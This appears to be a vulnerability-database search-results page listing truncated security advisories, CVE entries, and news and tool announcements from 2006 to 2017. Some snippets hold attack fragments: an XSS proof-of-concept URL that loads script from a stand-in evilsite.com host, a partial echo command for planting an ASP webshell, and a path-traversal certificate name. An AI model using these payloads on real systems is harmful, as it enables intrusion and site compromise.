
33 matches found

ThreatPost
added 2017/08/25 10:0 a.m., 21 views

Cryptocurrency Mining Malware Hosted in Amazon S3 Bucket

As Bitcoin’s price continues to soar beyond $4,000 USD per, cybercriminals are responding in kind by using techniques long reserved for adware, click-fraud and spying to now drop cryptocurrency miners onto compromised computers. The latest incident comes from a rash of drive-by downloads that are...

6.9 AI score
Exploits 0, References 4
Exploit DB
added 2015/11/16 12:0 a.m., 42 views

Kaspersky AntiVirus - Certificate Handling Directory Traversal

Source: https://code.google.com/p/google-security-research/issues/detail?id=539 When Kaspersky https inspection is enabled, temporary certificates are created in %PROGRAMDATA% for validation. I observed that the naming pattern is CN.cer. I created a certificate with CN="../../../../Users/All...

7.4 AI score
Exploits 0
Fedora
added 2015/03/30 7:8 a.m., 27 views

[SECURITY] Fedora 20 Update: mingw-xerces-c-3.1.1-9.fc20

Xerces-C is a validating XML parser written in a portable subset of C++. Xerces-C makes it easy to give your application the ability to read and write XML data. A shared library is provided for parsing, generating, manipulating, and validating XML documents. Xerces-C is faithful to the XML 1.0...

5 CVSS, 2.8 AI score, 0.25211 EPSS
Exploits 4
n0where
added 2013/09/03 11:34 p.m., 205 views

Penetration Testing Browser Bundle: PenQ

PenQ is an open source, Linux-based penetration testing browser bundle we built over Mozilla Firefox. It comes pre-configured with security tools for spidering, advanced web searching, fingerprinting, anonymous browsing, web server scanning, fuzzing, report generating and more. Penetration Testin...

0.1 AI score
Exploits 0
ThreatPost
added 2013/08/02 10:18 a.m., 16 views

Jason Geffner on Tortilla

Dennis Fisher talks with Jason Geffner of CrowdStrike about the new tool he released at Black Hat called Tortilla and his research on malware that uses domain-generating algorithms. audio https://media.threatpost.com/wp-content/uploads/sites/103/2013/08/07043604/digitalunderground120.mp3 Download...

0.5 AI score
Exploits 0, References 2
Kitploit
added 2013/06/03 2:46 a.m., 69 views

[PenQ] The Security Testing Browser Bundle

PenQ is an open source Linux based penetration testing browser bundle we built over Mozilla Firefox. It comes pre-configured with security tools for spidering, advanced web searching, fingerprinting, anonymous browsing, web server scanning, fuzzing, report generating and more. PenQ is configured ...

7.3 AI score
Exploits 0
Fedora
added 2013/03/11 1:24 a.m., 26 views

[SECURITY] Fedora 17 Update: crypto-utils-2.4.1-39.fc17

This package provides tools for managing and generating SSL certificates and keys...

3.6 CVSS, 2.7 AI score, 0.00147 EPSS
Exploits 1
The Hacker News
added 2011/12/11 3:15 p.m., 10 views

Fully Undetectable Backdoor generator for Metasploit

Security Labs Experts from India launch an automated Anti-Virus and Firewall Bypass Script. It's a modified and stable version made to work with the Backtrack 5 distro. Below you can find the modified version and a simple presentation on how i...

7 AI score
Exploits 0
Fedora
added 2009/08/25 4:41 a.m., 29 views

[SECURITY] Fedora 11 Update: xerces-c27-2.7.0-8.fc11

Xerces-C is a validating XML parser written in a portable subset of C++. Xerces-C makes it easy to give your application the ability to read and write XML data. A shared library is provided for parsing, generating, manipulating, and validating XML documents. Xerces-C is faithful to the XML 1.0...

4.3 CVSS, 6.1 AI score, 0.14146 EPSS
Exploits 1
myhack58
added 2009/07/05 12:0 a.m., 12 views

Echo out WebShell-vulnerability warning-the black bar safety net

On a side note process, you can execute the cmd without permission and relatively low in the case, sometimes you can use this method to help you down the target Station. Command format The Echo statement the target Station absolute directory For example: echo ^^%execute request"0"%^...

0.7 AI score
Exploits 0
Debian CVE
added 2006/10/02 8:0 p.m., 31 views

CVE-2006-5116

Multiple cross-site request forgery (CSRF) vulnerabilities in phpMyAdmin before 2.9.1-rc1 allow remote attackers to perform unauthorized actions as another user by (1) directly setting a token in the URL though dynamic variable evaluation and (2) unsetting arbitrary variables via the REQUEST array,...

5.1 CVSS, 6.7 AI score, 0.03863 EPSS
Exploits 0
Cvelist
added 2006/10/02 8:0 p.m., 33 views

CVE-2006-5116

Multiple cross-site request forgery (CSRF) vulnerabilities in phpMyAdmin before 2.9.1-rc1 allow remote attackers to perform unauthorized actions as another user by (1) directly setting a token in the URL though dynamic variable evaluation and (2) unsetting arbitrary variables via the REQUEST array,...

6.9 AI score, 0.03863 EPSS
Exploits 0, References 13
securityvulns
added 2006/06/06 12:0 a.m., 33 views

Kmita FAQ v1.0

Kmita FAQ v1.0 Homepage: http://www.kmita-faq.com Affected files: search.php index.php Search.php does not sanitize user input before dynamically generating it. Proof of concept: http://www.example.com/search.php?q=SCRIPT20SRC=http://evilsite.com/xss.js/SCRIPT SQL Injection proof of concept:...

0.7 AI score
Exploits 0